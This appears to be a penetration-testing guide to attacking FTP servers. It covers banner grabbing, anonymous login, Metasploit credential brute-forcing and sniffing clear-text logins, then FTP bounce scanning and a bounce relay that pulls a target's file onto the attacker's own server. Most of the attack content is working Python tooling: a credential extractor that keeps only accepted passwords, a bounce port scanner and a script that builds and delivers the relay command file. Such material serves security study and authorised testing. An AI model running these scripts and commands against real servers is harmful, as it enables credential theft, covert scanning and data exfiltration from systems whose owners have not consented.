The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and a server. Its control channel usually runs on 21/tcp (sometimes 2121/tcp); file contents travel over a separate data connection, which the server opens from port 20/tcp in active mode or which the client opens to a server-chosen port in passive mode. Credentials and data are sent in clear text unless FTPS (FTP over TLS) is negotiated.
The interactive client accepts familiar UNIX-style commands such as ls, cd, pwd and mkdir (file deletion is delete/mdelete in the standard ftp client; rm is an lftp command). Here is a short list of some client-specific commands:

| Command | Description |
| --- | --- |
| help | display local help information |
| get | download a file from the remote server |
| put | upload a file to the remote server |
| ascii | set the transfer type to "ASCII" |
| binary | set the transfer type to "Binary" |
| close | terminate the FTP session (the client stays open) |
| bye / quit | terminate the FTP session and exit the client |
Banner grabbing is useful to get basic information about the FTP server, such as its type and version: the 220 greeting sent right after the TCP connection is established often names the software. Connect to the control port directly:
telnet -vn $IP $PORT
The HELP and FEAT commands can give more information about the FTP server: HELP lists the commands it recognizes (unimplemented ones are starred), and FEAT lists the extended features it supports, such as AUTH TLS (explicit FTPS), MLST/MLSD or UTF8. A missing AUTH TLS means every login will cross the wire in clear text.
```
HELP
214-The following commands are recognized (* =>'s unimplemented):
214-CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
214-EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
214-XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
214-NOOP    FEAT    OPTS    AUTH    CCC*    CONF*   ENC*    MIC*
214-PBSZ    PROT    TYPE    STRU    MODE    RETR    STOR    STOU
214-APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
214-NLST    STAT    SITE    MLSD    MLST
214 Direct comments to [email protected]
FEAT
211-Features:
 PROT
 CCC
 PBSZ
 AUTH TLS
 MFF modify;UNIX.group;UNIX.mode;
 REST STREAM
 MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
 UTF8
 EPRT
 EPSV
 LANG en-US
 MDTM
 SSCN
 TVFS
 MFMT
 SIZE
211 End
```
Some FTP servers are configured to let users connect anonymously (user name anonymous or ftp, with any password, conventionally an e-mail address) and thus give them access to files on the server without authentication. Always check what an anonymous user can read, and whether it can also write, since a writable anonymous directory is often the foothold for a later stage.
```shell
$ ftp $IP $PORT
Name: anonymous
Password: <nothing>
ftp> ls -a    # List all files (even hidden) (yes, they could be hidden)
ftp> ...
```
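The banner grab, the FEAT query and the anonymous-login check above can be scripted in one pass. The following is an added example and not code from the original page: it reads RFC 959 replies (including multi-line ones such as the HELP/FEAT output shown above), turns the FEAT body into a feature map and reports whether anonymous login is accepted. The host and port passed on the command line are assumptions about the target; the FEAT sample used for the pure functions is the one already shown on this page.

```python
import socket
from typing import Dict, List, Tuple


def parse_reply(text: str) -> Tuple[int, List[str]]:
    """Split one complete FTP reply into (code, body lines).

    RFC 959 multi-line replies open with 'NNN-' and end with a line 'NNN ';
    lines in between may repeat the code or be free text (FEAT indents them).
    """
    lines = text.splitlines()
    if not lines or len(lines[0]) < 4 or not lines[0][:3].isdigit():
        raise ValueError(f"malformed reply: {text!r}")
    code = lines[0][:3]
    body = []
    for ln in lines:
        if ln.startswith(code) and ln[3:4] in ("-", " "):
            body.append(ln[4:])
        else:
            body.append(ln)
    return int(code), body


def reply_complete(buf: bytes) -> bool:
    """True once buf holds a whole reply, i.e. the terminating 'NNN ' line."""
    text = buf.decode("latin-1")
    if not text.endswith("\r\n"):
        return False
    code = text[:3]
    if not code.isdigit():
        return True  # not a reply at all; parse_reply will raise on it
    return any(ln.startswith(code + " ") for ln in text.splitlines())


def read_reply(sock: socket.socket) -> Tuple[int, List[str]]:
    buf = b""
    while not reply_complete(buf):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the control connection")
        buf += chunk
    return parse_reply(buf.decode("latin-1"))


def send_cmd(sock: socket.socket, cmd: str) -> Tuple[int, List[str]]:
    sock.sendall((cmd + "\r\n").encode("latin-1"))
    return read_reply(sock)


def parse_features(body: List[str]) -> Dict[str, str]:
    """Map FEAT body lines to {FEATURE: argument}, dropping the 'Features:'/'End' framing."""
    feats: Dict[str, str] = {}
    for ln in body[1:-1]:
        ln = ln.strip()
        if ln:
            name, _, arg = ln.partition(" ")
            feats[name.upper()] = arg
    return feats


def recon(host: str, port: int = 21, timeout: float = 5.0) -> dict:
    """Banner, SYST, FEAT and an anonymous-login attempt against a live server (needs network)."""
    out: dict = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        out["banner"] = read_reply(s)[1]
        out["syst"] = send_cmd(s, "SYST")[1]
        code, body = send_cmd(s, "FEAT")
        out["features"] = parse_features(body) if code == 211 else {}
        out["explicit_tls"] = "AUTH" in out["features"]
        code, _ = send_cmd(s, "USER anonymous")
        if code == 331:  # password requested; anonymous FTP accepts any string
            code, _ = send_cmd(s, "PASS anonymous@")
        out["anonymous_login"] = code == 230
        try:
            send_cmd(s, "QUIT")
        except OSError:
            pass  # some servers close right after the 221 goodbye
    return out


if __name__ == "__main__":
    import sys
    print(recon(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 21))
```

Run it as `python3 recon.py $IP $PORT`; a 230 on the anonymous attempt is the same result the interactive session above would show, and an empty or AUTH-less feature map tells you that credential sniffing (next section) is worth the effort.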
Credentials can be brute-forced with Metasploit's ftp_login scanner (it also tries anonymous by default):

```shell
msfconsole
use auxiliary/scanner/ftp/ftp_login
set RHOSTS $IP
set RPORT $PORT
set USER_FILE $user.txt
set PASS_FILE $pass.txt
run
```
If FTP traffic is not encrypted (plain FTP rather than FTPS or SFTP) and the attacker is on the same network as the client or the server, the packets travelling between them can be sniffed to retrieve credentials: USER and PASS are sent in clear text on the control channel, and the files themselves in clear text on the data channel. Tools such as Wireshark (or tcpdump and tshark) can be used to capture and reassemble the TCP stream.
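What the sniffer has to do with a captured control channel is small enough to show in full. The block below is an added example, not code from the original page: it walks a reassembled FTP control stream (one line per message, prefixed with a constructed direction marker, the way Wireshark's "Follow TCP Stream" presents it), pairs every USER with its PASS, records whether the server answered 230 or 530, and stops reading if an AUTH TLS request was accepted, because from that point on the channel is encrypted and nothing more can be recovered. The sample stream and the credentials in it are constructed for the example.

```python
from typing import Dict, List

# Constructed sample: an FTP control-channel conversation as reassembled from
# a capture. "C>" marks client-to-server lines, "S>" server-to-client lines.
SAMPLE_STREAM = """\
S> 220 ProFTPD Server (Debian) [::ffff:10.0.0.5]
C> AUTH TLS
S> 500 AUTH not understood
C> USER alice
S> 331 Password required for alice
C> PASS Wrong-Pass-1
S> 530 Login incorrect.
C> USER alice
S> 331 Password required for alice
C> PASS Summer2024!
S> 230 User alice logged in
C> PASV
S> 227 Entering Passive Mode (10,0,0,5,195,80)
"""


def extract_credentials(stream: str) -> List[Dict[str, object]]:
    """Return every login attempt seen in clear text, with the server's verdict.

    ok is True for a 230 reply, False for 530, None if the capture ended first.
    """
    attempts: List[Dict[str, object]] = []
    user = None
    last_cmd = None
    pending = None  # the attempt still waiting for the server's 230/530 verdict
    for raw in stream.splitlines():
        if raw.startswith("C> "):
            cmd, _, arg = raw[3:].partition(" ")
            last_cmd = cmd.upper()
            if last_cmd == "USER":
                user = arg
            elif last_cmd == "PASS" and user is not None:
                pending = {"user": user, "password": arg, "ok": None}
                attempts.append(pending)
        elif raw.startswith("S> "):
            code = raw[3:6]
            if last_cmd == "AUTH" and code == "234":
                break  # TLS handshake follows; the rest of the stream is ciphertext
            if last_cmd == "USER" and code == "230":
                attempts.append({"user": user, "password": "", "ok": True})
            elif pending is not None and code in ("230", "530"):
                pending["ok"] = code == "230"
                pending = None
    return attempts


def valid_credentials(stream: str) -> List[str]:
    """'user:password' for every login the server actually accepted."""
    return [f"{a['user']}:{a['password']}" for a in extract_credentials(stream) if a["ok"]]
```

The same selection can be done live with tshark using a display filter on the ftp.request.command field for USER and PASS; the point of the script is the pairing and the 230/530 verdict, which tells you which of the sniffed passwords is actually worth using.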
FTP bounce attacks abuse the PORT command, with which the client tells the server which IP address and port to connect to for the data channel. A server that does not check that this address belongs to the connecting client will open data connections to arbitrary third-party hosts on the attacker's behalf. This is mostly used to port-scan other hosts without being detected (the FTP server, not the attacker, makes the connections, so the scan is traced back to it), for denial-of-service attacks, or to download files from another FTP server.
To check whether an FTP server is vulnerable to bounce attacks, and to scan through it, nmap's -b (FTP bounce scan) option can be used; nmap's ftp-bounce NSE script performs only the vulnerability check. If the server is vulnerable, an attacker can use it to scan the server's own network, including hosts that are not reachable from the attacker directly, without being detected:

```shell
nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'
```

-P0 is the older spelling of -Pn (skip host discovery), which is needed because the attacker may have no direct path to the targets at all.
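To see what nmap is doing behind -b, here is the exchange written out as a small client. This is an added example and not code from the original page or from nmap: for each target port it sends PORT with the target's address, then LIST, and reads the reply codes. A 200 to PORT followed by a 150 to LIST means the FTP server managed to connect to the target (port open); 425 means it could not (closed or filtered); 500/501 to PORT ("Illegal PORT command") means the server validates the address and is not usable as a bounce host. The server, credentials and target addresses are assumptions you substitute for your own engagement.

```python
from ftplib import FTP, error_perm, error_temp
from typing import Dict, Iterable


def port_arg(ip: str, port: int) -> str:
    """Encode host/port as the h1,h2,h3,h4,p1,p2 argument of the PORT command."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError("expected a dotted IPv4 address")
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def classify(port_code: int, list_code: int) -> str:
    """Map the reply codes of PORT + LIST onto the state of the target port."""
    if port_code in (500, 501):
        return "not-vulnerable"  # server checks the PORT address; no bouncing
    if port_code != 200:
        return "unknown"
    if list_code in (125, 150, 226):
        return "open"            # the server reached the target port
    if list_code == 425:
        return "closed"          # "Can't build data connection"
    return "unknown"


def _reply_code(action) -> int:
    """Run an ftplib call and return its 3-digit code; 4xx/5xx come back as exceptions."""
    try:
        return int(action()[:3])
    except (error_temp, error_perm) as exc:
        return int(str(exc)[:3])


def bounce_scan(ftp_host: str, user: str, password: str, target_ip: str,
                ports: Iterable[int], ftp_port: int = 21, timeout: float = 10.0) -> Dict[int, str]:
    """Scan target_ip's ports through the FTP server at ftp_host (needs a live server)."""
    ftp = FTP()
    ftp.connect(ftp_host, ftp_port, timeout=timeout)
    ftp.login(user, password)
    results: Dict[int, str] = {}
    for p in ports:
        port_code = _reply_code(lambda: ftp.sendcmd("PORT " + port_arg(target_ip, p)))
        list_code = 0
        if port_code == 200:
            list_code = _reply_code(lambda: ftp.sendcmd("LIST"))
            if list_code in (125, 150):
                try:
                    ftp.getresp()  # swallow the 226/426 that ends the listing
                except (error_temp, error_perm):
                    pass
        results[p] = classify(port_code, list_code)
        if results[p] == "not-vulnerable":
            break  # no point continuing; every further PORT will be refused
    ftp.quit()
    return results


if __name__ == "__main__":
    # Assumed values: an FTP server you are authorised to test and an internal target.
    print(bounce_scan("ftp.example.test", "anonymous", "anonymous@", "10.0.0.10", [22, 80, 445]))
```

Like the interactive attack, this is slow (one LIST per port) and noisy on the FTP server's side, but the target only ever sees connections from the FTP server's address.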
If an attacker has access to a bounce-capable FTP server, they can make it request a file from another FTP server and have that file delivered to a server of their own. The steps below are the classic technique: the attacker's own server is made to listen for the file, a command script is uploaded to the intermediate server, and the intermediate server is then told to "send" that script to the target's control port, where it is interpreted as commands.
Connect to your own FTP server and issue raw PASV and STOR commands (through the client's quote command, so that the server rather than the client opens the data socket): the server then listens on a data port and will write whatever connects to it into a file, which is where the victim server will send the file.

```shell
# Start your own server and connect to it
service pure-ftpd start
ftp My_IP 21
ftp> user my_own_username
# Ask the server to open a listening data port
ftp> quote PASV
227 Entering Passive Mode (F,F,F,F,X,X)   # note the output (IP and port: F.F.F.F, X*256+X)
# Tell the server to accept whatever connects to that port and store it into the file "dump"
ftp> quote STOR dump
```
Create the file to send to the intermediate server, containing the commands that the targeted server will have to execute; let's call this file instrs. Each line is a complete FTP command (the # annotations are explanations, not part of the file). The trailing null bytes pad the file out so that the intermediate server keeps the data connection to the target open long enough for the target to finish sending the file; the target's command parser ignores them.

```
user ftp                # user and password for the targeted server
pass [email protected]
cwd /DIRECTORY
type i
port F,F,F,F,X,X        # IP and port of the attacker's server, taken from the PASV reply above
retr file.tar.Z
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@...
```
Upload this file to the intermediate server, then make the intermediate server "retrieve" it to the targeted server's control port (21), so that the target reads the file as if it were commands typed by a client:

```shell
# Run these commands on the intermediate server
put instrs
quote "port C,C,C,C,0,21"   # IP of the targeted server; 0,21 encodes port 21 (0*256+21)
quote "retr instrs"
```
The target logs in as instructed, connects to the attacker's listening data port and sends file.tar.Z; the attacker should then find it on their own server stored as 'dump'.
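The two pieces of this procedure that are easy to get wrong by hand are the F,F,F,F,X,X arithmetic and the exact framing of the instrs file (CRLF after every command, padding after QUIT). The block below is an added example and not code from the original page: parse_pasv() turns the 227 reply from the attacker's own server into the address and port to embed, build_instrs() assembles the command file, and relay_via_bounce() performs the put/port/retr step against the intermediate server with Python's ftplib. Host names, users and file names are assumptions for illustration; only a live, bounce-capable server will make the last function do anything.

```python
import io
import re
from ftplib import FTP
from typing import Tuple

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(reply: str) -> Tuple[str, int]:
    """'227 Entering Passive Mode (10,0,0,7,195,80)' -> ('10.0.0.7', 50000)."""
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError(f"no h1,h2,h3,h4,p1,p2 tuple in {reply!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError("octet out of range")
    return f"{h1}.{h2}.{h3}.{h4}", (p1 << 8) | p2


def port_tuple(ip: str, port: int) -> str:
    """Dotted IPv4 + port -> the h1,h2,h3,h4,p1,p2 form used by PORT."""
    return ",".join(ip.split(".") + [str(port >> 8), str(port & 0xFF)])


def build_instrs(target_user: str, target_pass: str, directory: str, filename: str,
                 attacker_ip: str, attacker_port: int, pad: int = 250_000) -> bytes:
    """Assemble the command stream the target will read off its control port.

    Every command is CRLF-terminated; the null padding keeps the bounce server's
    data connection to the target alive while the target performs the RETR.
    """
    cmds = [
        f"USER {target_user}",
        f"PASS {target_pass}",
        f"CWD {directory}",
        "TYPE I",
        f"PORT {port_tuple(attacker_ip, attacker_port)}",
        f"RETR {filename}",
        "QUIT",
    ]
    return "".join(c + "\r\n" for c in cmds).encode("latin-1") + b"\x00" * pad


def relay_via_bounce(bounce_host: str, user: str, password: str, instrs: bytes,
                     target_ip: str, target_port: int = 21, remote_name: str = "instrs") -> str:
    """put instrs; PORT target,0,21; RETR instrs, as in the interactive session above."""
    ftp = FTP(bounce_host, user, password)
    ftp.storbinary(f"STOR {remote_name}", io.BytesIO(instrs))
    ftp.sendcmd("PORT " + port_tuple(target_ip, target_port))
    resp = ftp.sendcmd(f"RETR {remote_name}")  # 150: the bounce server is now feeding the target
    if resp.startswith("1"):
        ftp.getresp()  # 226 once the whole (padded) file has been pushed
    ftp.quit()
    return resp


if __name__ == "__main__":
    # Assumed values: the 227 line from your own server's PASV, the target's
    # anonymous credentials and path, and the intermediate (bounce) server.
    my_ip, my_port = parse_pasv("227 Entering Passive Mode (10,0,0,7,195,80)")
    script = build_instrs("ftp", "guest@", "/pub", "file.tar.Z", my_ip, my_port)
    print(relay_via_bounce("bounce.example.test", "anonymous", "anonymous@", script, "10.0.0.20"))
```

Because the target only ever sees a connection from the intermediate server and then pushes the file to whatever address the PORT line names, the attacker's address appears nowhere in the target's logs; the intermediate server's logs, on the other hand, record the upload and the odd PORT to port 21, which is what a defender should alert on.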